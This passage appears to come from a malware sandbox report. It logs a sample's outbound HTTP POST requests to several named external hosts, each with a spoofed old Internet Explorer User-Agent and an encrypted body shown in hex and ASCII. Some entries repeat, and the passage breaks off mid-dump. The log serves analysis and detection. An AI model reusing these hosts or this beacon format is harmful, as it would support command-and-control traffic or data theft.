4b 31 67 41 74 73 6d 4d 42 63 2f 56 49 6d 36 61 43 65 5a 4f 6a 59 79 68 6c 43 76 4c 78 37 45 62 57 39 58 64 43 71 2b 70 35 4c 4e 73 50 68 58 65 4a 30 53 50 33 64 72 75 34 6e 74 59 32 7a 66 71 6e 5a 50 77 63 36 69 6d 61 7a 56 71 6c 58 39 66 50 4a 58 34 4e 4f 38 43 4e 39 47 43 62 64 51 49 77 62 2b 53 72 46 65 76 6a 77 59 4f 57 64 4d 33 4f 31 71 41 62 52 58 47 5a 72 75 6f 62 73 5a 6d 46 69 30 71 78 35 72 44 41 58 61 59 30 55 30 70 38 74 48 33 32 44 47 37 64 74 79 30 56 54 34 73 66 47 6a 43 70 32 43 33 37 68 4e 54 47 4a 52 68 6d 4d 67 45 37 67 55 6d 4f 4b 53 6c 4c 61 42 6f 47 48 6e 44 2b 37 6b 3d Data Ascii: Uo0WLZGHYZTWWKtuMJuP3urBIvdP4DXFVVcT5JxsjecsLV0m6sVUNo4s8ubgE2T3HYHOrl41O6bitvfnXumn0VrSuHy6+hyJSsEsfJO1eRNf1BM2bgR2YCU9CQenGGBeo2r0UPTSvu9CDl8miseSSBX2K44+X7cxuZb9TEr/0cjn06WRFgC/yHmnkOPZKZ117O4XUg0pOYJ0/h5ZqRboQZGv8wdgEDPwT/NAyISqUwiCesCxhiSmTBO+doe5Fnho3Tt+tQ9gzzyhs8YDWRUcyq7f66ULcKS8r+wTisDoTTnnOUhzkd8goONqLqEnW3lS50btgkMHi2LupiJ5+IdlBjKmcs1Yfrr3139BK1gAtsmMBc/VIm6aCeZOjYyhlCvLx7EbW9XdCq+p5LNsPhXeJ0SP3dru4ntY2zfqnZPwc6imazVqlX9fPJX4NO8CN9GCbdQIwb+SrFevjwYOWdM3O1qAbRXGZruobsZmFi0qx5rDAXaY0U0p8tH32DG7dty0VT4sfGjCp2C37hNTGJRhmMgE7gUmOKSlLaBoGHnD+7k=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 48 73 4a 64 64 65 2b 41 64 4a 51 52 73 69 58 6f 44 72 6b 50 79 66 67 6f 31 39 4d 46 4d 4d 7a 72 6b 36 64 46 4f 64 39 73 52 43 52 79 42 30 68 71 44 6a 57 53 30 54 39 6f 58 53 62 49 4e 59 62 43 50 52 43 56 78 57 75 6d 67 41 4f 6b 45 34 37 5a 5a 2b 4d 79 63 64 57 55 46 7a 68 63 64 56 71 58 46 6b 72 7a 47 34 76 64 56 76 35 67 6f 4d 56 7a 66 2f 2b 61 45 77 4f 54 57 49 54 54 67 53 6c 5a 55 44 61 44 78 4a 49 6e 52 59 49 36 72 30 4b 66 4f 30 65 37 38 77 5a 70 61 42 6d 2b 7a 2b 6e 48 77 2f 6e 67 4d 6d 4d 6f 32 73 4d 64 32 4e 4b 33 75 43 4c 45 39 5a 4e 73 76 56 2b 77 31 72 49 45 78 39 48 4b 47 38 62 61 35 38 4c 46 6e 31 30 4c 4b 79 7a 70 6b 42 4e 35 64 78 71 69 33 53 62 4d 34 32 70 66 46 38 69 33 52 54 72 65 46 57 39 4f 6c 4f 43 34 37 52 79 67 2f 61 77 63 67 31 44 46 2b 4d 6f 75 43 34 2f 55 71 64 56 63 6b 52 36 73 76 44 62 79 44 78 52 6d 77 6e 4f 58 6a 47 32 70 2f 51 50 46 5a 37 31 77 62 32 47 37 44 43 66 6e 78 36 68 38 71 6b 50 2b 6f 58 4b 66 75 67 4a 4b 6a 36 45 56 5a 58 36 6b 43 38 51 58 4f 51 4d 4d 4c 44 56 79 69 78 58 50 68 62 58 32 47 2f 4a 64 47 41 48 62 58 69 66 4e 67 52 48 68 34 33 79 66 48 38 35 4e 6b 72 2b 30 37 4f 34 71 76 4a 35 36 4c 68 50 2b 2b 45 4f 41 67 6f 51 34 6e 58 5a 4c 63 74 6b 48 4e 69 70 2b 36 32 56 62 68 45 37 78 70 4b 75 59 36 30 39 4d 4b 64 35 52 52 30 31 6a 64 71 61 41 6d 48 71 6c 68 47 2b 69 4b 49 45 73 68 4a 6d 5a 77 63 2b 63 53 38 57 49 46 39 36 66 52 44 42 2b 55 62 77 43 65 58 55 6d 79 4c 54 36 37 71 70 42 51 33 73 4f 63 4d 55 4b 2f 48 52 71 4b 75 61 50 79 69 35 30 55 72 49 48 76 36 47 76 6b 67 73 41 55 6f 34 47 71 30 64 36 7a 39 38 75 59 61 50 59 66 35 30 71 33 6a 6f 44 61 51 43 75 4e 78 53 68 35 48 51 6a 75 51 3d 3d Data Ascii: HsJdde+AdJQRsiXoDrkPyfgo19MFMMzrk6dFOd9sRCRyB0hqDjWS0T9oXSbINYbCPRCVxWumgAOkE47ZZ+MycdWUFzhcdVqXFkrzG4vdVv5goMVzf/+aEwOTWITTgSlZUDaDxJInRYI6r0KfO0e78wZpaBm+z+nHw/ngMmMo2sMd2NK3uCLE9ZNsvV+w1rIEx9HKG8ba58LFn10LKyzpkBN5dxqi3SbM42pfF8i3RTreFW9OlOC47Ryg/awcg1DF+MouC4/UqdVckR6svDbyDxRmwnOXjG2p/QPFZ71wb2G7DCfnx6h8qkP+oXKfugJKj6EVZX6kC8QXOQMMLDVyixXPhbX2G/JdGAHbXifNgRHh43yfH85Nkr+07O4qvJ56LhP++EOAgoQ4nXZLctkHNip+62VbhE7xpKuY609MKd5RR01jdqaAmHqlhG+iKIEshJmZwc+cS8WIF96fRDB+UbwCeXUmyLT67qpBQ3sOcMUK/HRqKuaPyi50UrIHv6GvkgsAUo4Gq0d6z98uYaPYf50q3joDaQCuNxSh5HQjuQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 51 70 77 59 4b 52 74 58 65 70 54 4c 74 6b 36 4d 4d 69 48 39 42 67 52 63 53 62 36 68 33 78 74 51 66 36 4b 68 52 30 36 39 42 58 52 4b 74 44 2f 6d 56 4f 69 65 39 47 4d 64 6d 62 2b 39 71 51 6c 78 57 33 5a 46 71 35 6a 58 58 41 76 38 2b 62 79 77 78 32 68 69 37 51 6c 44 51 32 66 71 49 30 44 68 6a 52 39 71 56 48 58 6c 57 4c 6e 45 65 75 30 68 65 74 4b 75 4b 47 69 35 33 73 51 4a 6f 5a 62 39 4a 6e 63 2b 67 39 71 53 6c 59 64 71 65 41 58 57 6e 4e 4b 58 53 2f 41 61 78 78 71 6a 4c 53 45 49 4e 30 5a 47 46 4f 2b 78 4e 33 53 38 55 76 45 49 51 56 53 76 58 61 36 33 6c 6e 44 65 6f 55 37 39 58 63 62 2f 4a 61 77 73 4a 31 68 4a 56 6a 70 77 72 70 69 76 50 74 6e 2b 77 35 31 68 49 6a 78 74 4d 6d 7a 54 65 74 43 62 53 6e 70 47 79 59 2b 6d 44 32 4b 61 47 65 33 41 41 32 57 33 41 74 31 64 47 58 77 5a 36 39 33 6e 63 74 2f 35 76 33 62 39 4b 58 55 6f 67 47 6b 61 6e 6a 45 6f 49 36 43 68 61 6e 46 6d 43 69 51 67 57 72 71 49 69 43 48 76 79 51 68 47 65 52 30 2f 46 44 61 36 42 35 75 4c 72 37 79 6e 72 58 38 7a 47 62 7a 65 46 36 6f 6f 38 4c 59 68 57 6c 48 47 6f 64 63 70 6c 49 64 49 37 31 65 66 58 63 64 63 69 73 52 6a 35 54 31 35 77 69 68 68 38 43 46 55 4e 72 65 32 55 68 55 41 47 69 4c 72 78 51 38 5a 66 61 48 30 52 41 6f 69 57 51 32 33 78 33 6e 56 4e 4b 31 73 58 6a 57 46 45 71 62 35 67 67 59 4e 43 66 53 77 74 32 71 51 6b 45 78 56 43 79 75 30 64 6c 6f 46 48 68 7a 72 6a 39 69 32 4c 34 77 67 4e 42 56 41 36 4a 75 30 6d 78 69 7a 4b 4f 2b 63 58 53 32 71 54 70 70 6d 79 4d 31 38 61 71 41 54 6e 53 6f 62 39 59 69 64 4a 4f 76 2f 4e 71 4e 4a 6e 61 62 74 65 6b 4f 6f 75 32 37 75 4c 41 72 6e 6c 6c 79 56 48 6f 49 57 6a 34 68 4a 59 6e 4f 43 33 2b 4c 43 32 4a 34 3d Data Ascii: QpwYKRtXepTLtk6MMiH9BgRcSb6h3xtQf6KhR069BXRKtD/mVOie9GMdmb+9qQlxW3ZFq5jXXAv8+bywx2hi7QlDQ2fqI0DhjR9qVHXlWLnEeu0hetKuKGi53sQJoZb9Jnc+g9qSlYdqeAXWnNKXS/AaxxqjLSEIN0ZGFO+xN3S8UvEIQVSvXa63lnDeoU79Xcb/JawsJ1hJVjpwrpivPtn+w51hIjxtMmzTetCbSnpGyY+mD2KaGe3AA2W3At1dGXwZ693nct/5v3b9KXUogGkanjEoI6ChanFmCiQgWrqIiCHvyQhGeR0/FDa6B5uLr7ynrX8zGbzeF6oo8LYhWlHGodcplIdI71efXcdcisRj5T15wihh8CFUNre2UhUAGiLrxQ8ZfaH0RAoiWQ23x3nVNK1sXjWFEqb5ggYNCfSwt2qQkExVCyu0dloFHhzrj9i2L4wgNBVA6Ju0mxizKO+cXS2qTppmyM18aqATnSob9YidJOv/NqNJnabtekOou27uLArnllyVHoIWj4hJYnOC3+LC2J4=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 47 6b 75 38 74 73 47 75 37 38 77 67 56 5a 73 43 6f 4c 6b 55 4e 5a 72 67 6a 30 55 2f 58 79 6f 36 68 64 47 6b 5a 78 6c 32 64 41 67 65 68 65 6a 41 4b 36 58 43 4c 6a 47 46 50 74 45 69 5a 39 47 46 52 61 79 59 67 4d 62 4e 59 46 45 73 6f 50 36 67 2b 37 65 72 79 67 6e 52 32 6e 47 33 71 6a 5a 76 4f 5a 57 44 74 7a 68 47 53 74 71 44 2f 37 55 34 62 67 41 71 7a 33 47 39 30 47 51 63 53 41 50 2f 4c 57 36 62 41 32 74 34 4a 6e 56 68 39 6c 56 4a 42 70 6d 5a 6e 65 38 72 39 55 67 61 31 6f 6e 4d 6b 5a 50 56 37 72 33 6e 78 59 68 6d 58 49 51 58 7a 66 49 65 38 74 4a 64 53 6f 58 49 43 45 79 64 45 79 68 4b 79 49 45 36 35 44 47 46 43 51 74 30 73 35 52 46 32 32 71 6f 45 6e 42 55 45 51 52 36 36 66 4b 70 49 32 39 6f 72 76 35 55 46 41 56 2b 67 67 45 62 41 6a 31 48 65 48 50 7a 54 4e 56 48 4b 54 79 56 44 55 71 34 50 6f 6a 77 52 6e 62 4b 2b 47 69 44 65 6a 6e 51 6c 63 4c 6d 50 65 35 4a 58 36 69 71 43 50 46 63 34 43 47 58 49 5a 2b 70 4f 52 45 7a 57 4d 64 50 64 4a 6d 53 4c 4e 47 62 5a 4c 36 34 37 30 37 45 4f 50 34 43 51 50 39 58 74 47 45 52 47 6b 36 66 33 34 79 6f 59 57 34 30 2f 6e 4c 50 43 54 55 67 55 65 48 4d 63 6d 7a 65 4f 78 72 37 4d 39 61 64 58 67 70 44 45 53 51 42 71 39 54 55 6d 51 47 69 55 69 78 76 2b 4b 6f 35 36 7a 6b 6a 56 4e 6f 74 4d 6a 4a 79 58 72 78 6f 54 51 48 59 79 41 30 59 75 6f 77 4b 4c 2b 59 4f 4f 2b 42 56 73 43 52 6b 42 6c 47 73 6b 50 48 4f 35 75 72 4d 7a 6f 31 55 68 30 43 6b 62 58 48 63 4c 73 74 6d 50 2b 7a 71 67 53 74 2f 48 39 72 35 37 54 36 33 33 32 2f 58 2f 6f 2b 64 61 53 62 50 4a 43 66 5a 53 50 31 47 50 69 4e 48 75 33 30 67 4b 6c 71 6c 44 32 71 47 4e 7a 4f 39 6e 59 77 75 54 73 62 50 56 41 59 36 6d 39 75 35 41 74 4f 38 55 75 35 73 38 7a 6a 6c 75 48 68 56 69 50 68 6c 34 79 35 5a 61 52 74 70 2b 74 6a 6a Data Ascii: Gku8tsGu78wgVZsCoLkUNZrgj0U/Xyo6hdGkZxl2dAgehejAK6XCLjGFPtEiZ9GFRayYgMbNYFEsoP6g+7erygnR2nG3qjZvOZWDtzhGStqD/7U4bgAqz3G90GQcSAP/LW6bA2t4JnVh9lVJBpmZne8r9Uga1onMkZPV7r3nxYhmXIQXzfIe8tJdSoXICEydEyhKyIE65DGFCQt0s5RF22qoEnBUEQR66fKpI29orv5UFAV+ggEbAj1HeHPzTNVHKTyVDUq4PojwRnbK+GiDejnQlcLmPe5JX6iqCPFc4CGXIZ+pOREzWMdPdJmSLNGbZL64707EOP4CQP9XtGERGk6f34yoYW40/nLPCTUgUeHMcmzeOxr7M9adXgpDESQBq9TUmQGiUixv+Ko56zkjVNotMjJyXrxoTQHYyA0YuowKL+YOO+BVsCRkBlGskPHO5urMzo1Uh0CkbXHcLstmP+zqgSt/H9r57T6332/X/o+daSbPJCfZSP1GPiNHu30gKlqlD2qGNzO9nYwuTsbPVAY6m9u5AtO8Uu5s8zjluHhViPhl4y5ZaRtp+tjj
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 55 6f 30 57 4c 5a 47 48 59 5a 54 57 57 4b 74 75 4d 4a 75 50 33 75 72 42 49 76 64 50 34 44 58 46 56 56 63 54 35 4a 78 73 6a 65 63 73 4c 56 30 6d 36 73 56 55 4e 6f 34 73 38 75 62 67 45 32 54 33 48 59 48 4f 72 6c 34 31 4f 36 62 69 74 76 66 6e 58 75 6d 6e 30 56 72 53 75 48 79 36 2b 68 79 4a 53 73 45 73 66 4a 4f 31 65 52 4e 66 31 42 4d 32 62 67 52 32 59 43 55 39 43 51 65 6e 47 47 42 65 6f 32 72 30 55 50 54 53 76 75 39 43 44 6c 38 6d 69 73 65 53 53 42 58 32 4b 34 34 2b 58 37 63 78 75 5a 62 39 54 45 72 2f 30 63 6a 6e 30 36 57 52 46 67 43 2f 79 48 6d 6e 6b 4f 50 5a 4b 5a 31 31 37 4f 34 58 55 67 30 70 4f 59 4a 30 2f 68 35 5a 71 52 62 6f 51 5a 47 76 38 77 64 67 45 44 50 77 54 2f 4e 41 79 49 53 71 55 77 69 43 65 73 43 78 68 69 53 6d 54 42 4f 2b 64 6f 65 35 46 6e 68 6f 33 54 74 2b 74 51 39 67 7a 7a 79 68 73 38 59 44 57 52 55 63 79 71 37 66 36 36 55 4c 63 4b 53 38 72 2b 77 54 69 73 44 6f 54 54 6e 6e 4f 55 68 7a 6b 64 38 67 6f 4f 4e 71 4c 71 45 6e 57 33 6c 53 35 30 62 74 67 6b 4d 48 69 32 4c 75 70 69 4a 35 2b 49 64 6c 42 6a 4b 6d 63 73 31 59 66 72 72 33 31 33 39 42 4b 31 67 41 74 73 6d 4d 42 63 2f 56 49 6d 36 61 43 65 5a 4f 6a 59 79 68 6c 43 76 4c 78 37 45 62 57 39 58 64 43 71 2b 70 35 4c 4e 73 50 68 58 65 4a 30 53 50 33 64 72 75 34 6e 74 59 32 7a 66 71 6e 5a 50 77 63 36 69 6d 61 7a 56 71 6c 58 39 66 50 4a 58 34 4e 4f 38 43 4e 39 47 43 62 64 51 49 77 62 2b 53 72 46 65 76 6a 77 59 4f 57 64 4d 33 4f 31 71 41 62 52 58 47 5a 72 75 6f 62 73 5a 6d 46 69 30 71 78 35 72 44 41 58 61 59 30 55 30 70 38 74 48 33 32 44 47 37 64 74 79 30 56 54 34 73 66 47 6a 43 70 32 43 33 37 68 4e 54 47 4a 52 68 6d 4d 67 45 37 67 55 6d 4f 4b 53 6c 4c 61 42 6f 47 48 6e 44 2b 37 6b 3d Data Ascii: Uo0WLZGHYZTWWKtuMJuP3urBIvdP4DXFVVcT5JxsjecsLV0m6sVUNo4s8ubgE2T3HYHOrl41O6bitvfnXumn0VrSuHy6+hyJSsEsfJO1eRNf1BM2bgR2YCU9CQenGGBeo2r0UPTSvu9CDl8miseSSBX2K44+X7cxuZb9TEr/0cjn06WRFgC/yHmnkOPZKZ117O4XUg0pOYJ0/h5ZqRboQZGv8wdgEDPwT/NAyISqUwiCesCxhiSmTBO+doe5Fnho3Tt+tQ9gzzyhs8YDWRUcyq7f66ULcKS8r+wTisDoTTnnOUhzkd8goONqLqEnW3lS50btgkMHi2LupiJ5+IdlBjKmcs1Yfrr3139BK1gAtsmMBc/VIm6aCeZOjYyhlCvLx7EbW9XdCq+p5LNsPhXeJ0SP3dru4ntY2zfqnZPwc6imazVqlX9fPJX4NO8CN9GCbdQIwb+SrFevjwYOWdM3O1qAbRXGZruobsZmFi0qx5rDAXaY0U0p8tH32DG7dty0VT4sfGjCp2C37hNTGJRhmMgE7gUmOKSlLaBoGHnD+7k=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 47 6b 75 38 74 73 47 75 37 38 77 67 56 5a 73 43 6f 4c 6b 55 4e 5a 72 67 6a 30 55 2f 58 79 6f 36 68 64 47 6b 5a 78 6c 32 64 41 67 65 68 65 6a 41 4b 36 58 43 4c 6a 47 46 50 74 45 69 5a 39 47 46 52 61 79 59 67 4d 62 4e 59 46 45 73 6f 50 36 67 2b 37 65 72 79 67 6e 52 32 6e 47 33 71 6a 5a 76 4f 5a 57 44 74 7a 68 47 53 74 71 44 2f 37 55 34 62 67 41 71 7a 33 47 39 30 47 51 63 53 41 50 2f 4c 57 36 62 41 32 74 34 4a 6e 56 68 39 6c 56 4a 42 70 6d 5a 6e 65 38 72 39 55 67 61 31 6f 6e 4d 6b 5a 50 56 37 72 33 6e 78 59 68 6d 58 49 51 58 7a 66 49 65 38 74 4a 64 53 6f 58 49 43 45 79 64 45 79 68 4b 79 49 45 36 35 44 47 46 43 51 74 30 73 35 52 46 32 32 71 6f 45 6e 42 55 45 51 52 36 36 66 4b 70 49 32 39 6f 72 76 35 55 46 41 56 2b 67 67 45 62 41 6a 31 48 65 48 50 7a 54 4e 56 48 4b 54 79 56 44 55 71 34 50 6f 6a 77 52 6e 62 4b 2b 47 69 44 65 6a 6e 51 6c 63 4c 6d 50 65 35 4a 58 36 69 71 43 50 46 63 34 43 47 58 49 5a 2b 70 4f 52 45 7a 57 4d 64 50 64 4a 6d 53 4c 4e 47 62 5a 4c 36 34 37 30 37 45 4f 50 34 43 51 50 39 58 74 47 45 52 47 6b 36 66 33 34 79 6f 59 57 34 30 2f 6e 4c 50 43 54 55 67 55 65 48 4d 63 6d 7a 65 4f 78 72 37 4d 39 61 64 58 67 70 44 45 53 51 42 71 39 54 55 6d 51 47 69 55 69 78 76 2b 4b 6f 35 36 7a 6b 6a 56 4e 6f 74 4d 6a 4a 79 58 72 78 6f 54 51 48 59 79 41 30 59 75 6f 77 4b 4c 2b 59 4f 4f 2b 42 56 73 43 52 6b 42 6c 47 73 6b 50 48 4f 35 75 72 4d 7a 6f 31 55 68 30 43 6b 62 58 48 63 4c 73 74 6d 50 2b 7a 71 67 53 74 2f 48 39 72 35 37 54 36 33 33 32 2f 58 2f 6f 2b 64 61 53 62 50 4a 43 66 5a 53 50 31 47 50 69 4e 48 75 33 30 67 4b 6c 71 6c 44 32 71 47 4e 7a 4f 39 6e 59 77 75 54 73 62 50 56 41 59 36 6d 39 75 35 41 74 4f 38 55 75 35 73 38 7a 6a 6c 75 48 68 56 69 50 68 6c 34 79 35 5a 61 52 74 70 2b 74 6a 6a Data Ascii: Gku8tsGu78wgVZsCoLkUNZrgj0U/Xyo6hdGkZxl2dAgehejAK6XCLjGFPtEiZ9GFRayYgMbNYFEsoP6g+7erygnR2nG3qjZvOZWDtzhGStqD/7U4bgAqz3G90GQcSAP/LW6bA2t4JnVh9lVJBpmZne8r9Uga1onMkZPV7r3nxYhmXIQXzfIe8tJdSoXICEydEyhKyIE65DGFCQt0s5RF22qoEnBUEQR66fKpI29orv5UFAV+ggEbAj1HeHPzTNVHKTyVDUq4PojwRnbK+GiDejnQlcLmPe5JX6iqCPFc4CGXIZ+pOREzWMdPdJmSLNGbZL64707EOP4CQP9XtGERGk6f34yoYW40/nLPCTUgUeHMcmzeOxr7M9adXgpDESQBq9TUmQGiUixv+Ko56zkjVNotMjJyXrxoTQHYyA0YuowKL+YOO+BVsCRkBlGskPHO5urMzo1Uh0CkbXHcLstmP+zqgSt/H9r57T6332/X/o+daSbPJCfZSP1GPiNHu30gKlqlD2qGNzO9nYwuTsbPVAY6m9u5AtO8Uu5s8zjluHhViPhl4y5ZaRtp+tjj
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 73 2b 64 46 46 59 63 43 67 70 53 76 58 63 56 57 74 74 34 35 30 31 42 61 6c 4c 68 39 33 52 42 58 71 7a 61 7a 43 66 33 70 51 69 76 44 2b 67 4f 34 56 65 68 5a 7a 75 63 33 46 59 6a 59 65 42 31 4e 52 6a 4d 47 61 64 44 45 69 50 59 62 72 6b 6e 63 6c 36 4c 57 69 48 56 54 45 45 30 62 4e 37 63 5a 65 48 4c 75 71 32 45 61 63 57 7a 48 52 7a 68 73 66 67 6d 31 78 70 6e 77 77 67 30 41 59 49 4c 73 50 30 38 34 56 56 6b 74 69 66 31 6c 50 4c 4b 4a 47 77 34 32 6e 51 6c 6c 75 71 5a 68 35 43 72 2f 48 31 63 78 35 46 44 79 6a 48 78 6f 64 59 38 67 63 41 73 49 64 5a 64 72 4f 34 64 37 59 50 4c 71 37 6d 2b 76 59 55 2b 70 50 52 77 68 72 4e 67 58 73 34 41 62 6a 42 31 45 66 63 56 62 63 6d 55 66 6f 36 36 70 46 73 35 5a 55 75 5a 75 35 57 32 33 43 32 41 73 76 6a 30 64 77 52 62 74 54 76 57 71 4b 75 6f 4d 58 72 61 73 4c 6d 6c 36 66 4f 64 36 43 6b 45 53 7a 70 64 37 39 33 50 70 44 6d 56 78 56 48 33 48 70 6e 6a 5a 42 49 34 6d 54 4b 38 64 53 6c 47 36 43 64 67 47 34 39 31 52 33 59 4a 72 63 50 58 61 73 78 70 37 37 39 59 77 75 42 63 56 51 50 52 6d 52 63 59 4c 58 45 58 51 6c 62 5a 69 79 66 43 44 7a 68 4d 6d 55 65 4a 2b 59 4d 5a 37 4a 43 51 54 2f 49 61 4a 74 30 37 49 36 48 37 66 52 4c 33 32 4e 66 74 6c 33 2b 41 63 74 71 68 48 53 68 6b 54 66 65 79 56 50 4b 71 51 6b 77 4c 78 72 74 57 6f 72 43 76 4c 72 32 4f 74 46 46 46 62 62 39 2b 36 49 74 44 75 47 70 44 56 7a 34 4b 2f 32 64 36 39 66 65 48 5a 41 4a 6b 4a 38 6a 54 51 32 37 77 6a 30 65 6c 4a 44 61 76 63 62 39 6a 46 55 58 32 79 75 2f 4d 79 46 73 48 4d 6f 78 6d 6f 55 4e 47 79 37 43 32 65 74 33 78 77 50 33 65 6d 52 77 53 42 6c 4b 76 6d 6a 46 75 46 30 45 79 6d 62 56 7a 72 72 42 6e 74 53 75 33 61 54 63 56 37 67 50 4c 69 59 6a 41 3d Data Ascii: s+dFFYcCgpSvXcVWtt4501BalLh93RBXqzazCf3pQivD+gO4VehZzuc3FYjYeB1NRjMGadDEiPYbrkncl6LWiHVTEE0bN7cZeHLuq2EacWzHRzhsfgm1xpnwwg0AYILsP084VVktif1lPLKJGw42nQlluqZh5Cr/H1cx5FDyjHxodY8gcAsIdZdrO4d7YPLq7m+vYU+pPRwhrNgXs4AbjB1EfcVbcmUfo66pFs5ZUuZu5W23C2Asvj0dwRbtTvWqKuoMXrasLml6fOd6CkESzpd793PpDmVxVH3HpnjZBI4mTK8dSlG6CdgG491R3YJrcPXasxp779YwuBcVQPRmRcYLXEXQlbZiyfCDzhMmUeJ+YMZ7JCQT/IaJt07I6H7fRL32Nftl3+ActqhHShkTfeyVPKqQkwLxrtWorCvLr2OtFFFbb9+6ItDuGpDVz4K/2d69feHZAJkJ8jTQ27wj0elJDavcb9jFUX2yu/MyFsHMoxmoUNGy7C2et3xwP3emRwSBlKvmjFuF0EymbVzrrBntSu3aTcV7gPLiYjA=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 47 6f 4b 73 46 64 38 46 67 70 54 65 77 74 4a 52 50 68 6b 6e 4b 47 67 76 43 6c 32 31 66 30 78 7a 67 33 74 52 75 57 49 6b 32 77 49 4e 73 36 33 6e 74 6c 31 75 38 2b 37 68 63 76 54 59 6f 64 4b 30 4a 31 64 57 72 4c 73 64 53 4b 4e 39 72 68 53 63 69 78 77 69 54 53 79 70 41 44 6c 39 71 6d 4c 77 6e 6c 7a 76 56 37 69 66 66 77 33 6a 42 71 63 46 58 37 65 4a 5a 70 61 47 50 57 67 55 63 75 38 67 44 34 62 76 53 4a 57 51 4b 71 2f 45 77 46 36 63 70 67 58 4c 67 65 75 79 37 51 6d 69 39 67 56 39 54 51 36 47 4a 6b 53 78 71 33 76 31 32 31 33 2f 66 74 61 58 2f 71 58 32 6c 36 43 37 2f 2f 51 63 71 71 44 5a 62 78 49 4e 66 51 73 33 36 46 37 4c 50 53 74 56 46 4d 51 2f 75 77 66 31 76 33 54 65 4d 65 73 32 41 48 48 77 48 53 6e 4d 6b 67 30 47 58 6c 4f 2b 6b 4e 76 35 74 6e 4a 43 43 68 36 2f 4b 52 35 31 6b 64 50 59 6d 35 4d 48 34 75 6e 64 47 48 77 73 4d 52 53 72 63 37 45 4c 4e 72 44 43 54 77 56 58 4f 64 77 62 62 73 42 4c 66 36 34 68 32 53 31 55 6e 41 76 58 59 51 31 6d 41 43 4e 50 72 67 55 75 46 78 38 33 4b 39 4b 52 4f 4b 78 2f 6e 49 46 42 52 41 5a 2b 54 78 64 6d 43 74 6b 6b 46 6a 51 36 70 71 51 56 5a 70 47 68 46 77 43 36 6b 73 79 77 52 37 68 46 31 36 33 53 4f 41 77 6c 39 6b 30 58 36 73 73 33 48 4c 5a 64 4c 38 6f 6f 2f 33 79 69 72 33 4e 2f 38 33 37 43 52 48 5a 59 62 7a 6c 2f 70 7a 50 6c 6f 6c 70 4e 4a 6e 52 46 52 68 6c 79 34 46 33 4b 33 4b 74 6d 62 55 65 47 4f 4c 38 79 67 2b 52 69 30 35 55 4f 64 32 51 5a 6f 32 4a 52 36 74 6a 6a 48 47 2f 61 71 56 2b 45 72 7a 31 54 65 57 33 52 6a 32 34 52 54 64 70 42 7a 73 55 61 5a 4f 37 70 64 4d 38 6f 48 78 42 41 45 43 46 47 70 52 52 51 34 5a 49 4d 39 53 32 4d 66 68 74 76 59 64 30 55 39 4b 49 65 36 4e 31 30 75 64 56 39 4c 4b 45 65 58 34 39 49 36 74 63 41 6d 67 3d 3d Data Ascii: GoKsFd8FgpTewtJRPhknKGgvCl21f0xzg3tRuWIk2wINs63ntl1u8+7hcvTYodK0J1dWrLsdSKN9rhScixwiTSypADl9qmLwnlzvV7iffw3jBqcFX7eJZpaGPWgUcu8gD4bvSJWQKq/EwF6cpgXLgeuy7Qmi9gV9TQ6GJkSxq3v1213/ftaX/qX2l6C7//QcqqDZbxINfQs36F7LPStVFMQ/uwf1v3TeMes2AHHwHSnMkg0GXlO+kNv5tnJCCh6/KR51kdPYm5MH4undGHwsMRSrc7ELNrDCTwVXOdwbbsBLf64h2S1UnAvXYQ1mACNPrgUuFx83K9KROKx/nIFBRAZ+TxdmCtkkFjQ6pqQVZpGhFwC6ksywR7hF163SOAwl9k0X6ss3HLZdL8oo/3yir3N/837CRHZYbzl/pzPlolpNJnRFRhly4F3K3KtmbUeGOL8yg+Ri05UOd2QZo2JR6tjjHG/aqV+Erz1TeW3Rj24RTdpBzsUaZO7pdM8oHxBAECFGpRRQ4ZIM9S2MfhtvYd0U9KIe6N10udV9LKEeX49I6tcAmg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 65 35 32 65 32 65 77 68 5a 35 54 72 38 73 45 59 31 37 51 37 4c 66 39 66 4e 75 39 45 68 58 49 35 34 4e 6d 4c 48 56 36 46 75 30 56 31 4a 6c 68 4f 57 6b 37 44 38 4b 39 36 70 43 4e 75 52 6e 75 46 38 47 6c 37 34 31 6f 34 4f 53 43 33 47 63 59 73 38 7a 47 78 65 6f 39 68 41 41 53 49 4d 66 64 55 76 4a 42 47 46 41 7a 52 66 2f 42 45 4f 30 6d 59 68 65 45 68 34 57 30 52 5a 57 43 48 63 69 73 54 71 38 33 32 69 6e 68 32 31 4d 5a 58 4c 58 70 36 5a 58 4a 44 6f 69 35 79 42 48 6e 2f 31 7a 75 56 69 69 77 6c 